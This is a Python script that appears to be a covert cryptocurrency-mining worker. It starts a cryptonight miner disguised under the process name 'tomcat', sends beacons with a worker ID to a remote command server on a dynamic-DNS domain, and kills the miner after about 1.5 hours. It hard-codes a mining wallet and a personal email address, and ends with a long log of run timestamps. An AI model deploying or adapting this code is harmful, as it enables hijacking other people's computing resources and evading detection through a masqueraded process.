import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:07.298377
#2018-02-17 16:34:05.642134
#2018-02-17 18:21:07.694157
#2018-02-17 20:11:01.265042
#2018-02-17 21:58:01.627081
#2018-02-17 23:43:06.940822
#2018-02-18 01:33:07.511327
#2018-02-18 03:19:04.847652
#2018-02-18 05:08:01.411174
#2018-02-18 07:00:08.111363
#2018-02-18 08:49:01.882262
#2018-02-18 10:36:01.893020
#2018-02-18 12:21:01.233220
#2018-02-18 14:07:07.294780
#2018-02-18 15:57:05.390075
#2018-02-18 17:47:01.639367
#2018-02-18 19:33:05.213768
#2018-02-18 21:18:02.230645
#2018-02-18 23:05:07.879865
#2018-02-19 00:52:06.691094
#2018-02-19 02:39:03.414438
#2018-02-19 04:26:06.591807
#2018-02-19 06:12:04.000143
#2018-02-19 08:01:07.731041
#2018-02-19 09:51:07.479589
#2018-02-19 11:41:07.813163
#2018-02-19 13:28:06.614284
#2018-02-19 15:18:06.456259
#2018-02-19 17:08:04.769212
#2018-02-19 18:56:05.731272
#2018-02-19 20:43:07.917897
#2018-02-19 22:31:03.790751
#2018-02-20 00:16:07.119716
#2018-02-20 02:04:07.936756
#2018-02-20 03:54:06.200071
#2018-02-20 05:38:07.703235
#2018-02-20 07:23:07.429465
#2018-02-20 09:08:07.513037
#2018-02-20 10:51:06.919551
#2018-02-20 12:38:09.041734
#2018-02-20 14:24:01.729378
#2018-02-20 16:10:03.795542
#2018-02-20 17:57:02.109231
#2018-02-20 19:49:05.218602
#2018-02-20 21:32:01.922432
#2018-02-20 23:14:08.271548
#2018-02-21 00:58:05.147570
#2018-02-21 02:44:04.372000
#2018-02-21 04:32:07.188560
#2018-02-21 06:19:04.956869
#2018-02-21 08:05:09.056662
#2018-02-21 09:51:07.303053
#2018-02-21 11:41:05.585986
#2018-02-21 13:33:01.451949
#2018-02-21 15:18:09.735920
#2018-02-21 17:08:05.325788
#2018-02-21 18:57:05.394067
#2018-02-21 20:46:06.527670
#2018-02-21 22:32:04.975072
#2018-02-22 00:22:01.922690
#2018-02-22 02:09:08.249742
#2018-02-22 03:56:01.906145
#2018-02-22 05:43:07.066841
#2018-02-22 07:28:06.563471
#2018-02-22 09:17:01.585870
#2018-02-22 11:04:09.000431
#2018-02-22 12:52:01.644877
#2018-02-22 14:41:01.815293
#2018-02-22 16:26:05.726955
#2018-02-22 18:12:06.397755
#2018-02-22 20:01:04.459245
#2018-02-22 21:51:05.646774
#2018-02-22 23:40:08.459960
#2018-02-23 01:29:04.679099
#2018-02-23 03:16:06.681789
#2018-02-23 05:02:07.913585
#2018-02-23 06:47:07.750623
#2018-02-23 08:34:06.062944
#2018-02-23 10:48:01.981153
#2018-02-23 12:46:10.806321
#2018-02-23 14:31:01.480882
#2018-02-23 16:22:02.152288
#2018-02-23 18:09:06.919528
#2018-02-23 19:55:06.521861
#2018-02-23 21:38:03.586682
#2018-02-23 23:28:05.948567
#2018-02-24 01:20:07.612363
#2018-02-24 03:14:04.451861
#2018-02-24 04:59:04.893059
#2018-02-24 06:47:01.996288
#2018-02-24 08:40:04.339492
#2018-02-24 10:24:03.664723
#2018-02-24 12:19:07.902619
#2018-02-24 14:12:05.912734
#2018-02-24 15:59:07.025857
#2018-02-24 17:53:01.585950
#2018-02-24 19:40:07.820788
#2018-02-24 21:27:06.807147
#2018-02-25 00:10:09.323958
#2018-02-25 04:03:05.979727
#2018-02-25 06:43:01.246856
#2018-02-25 11:40:07.032149
#2018-02-25 14:07:01.966014
#2018-02-25 15:42:01.534412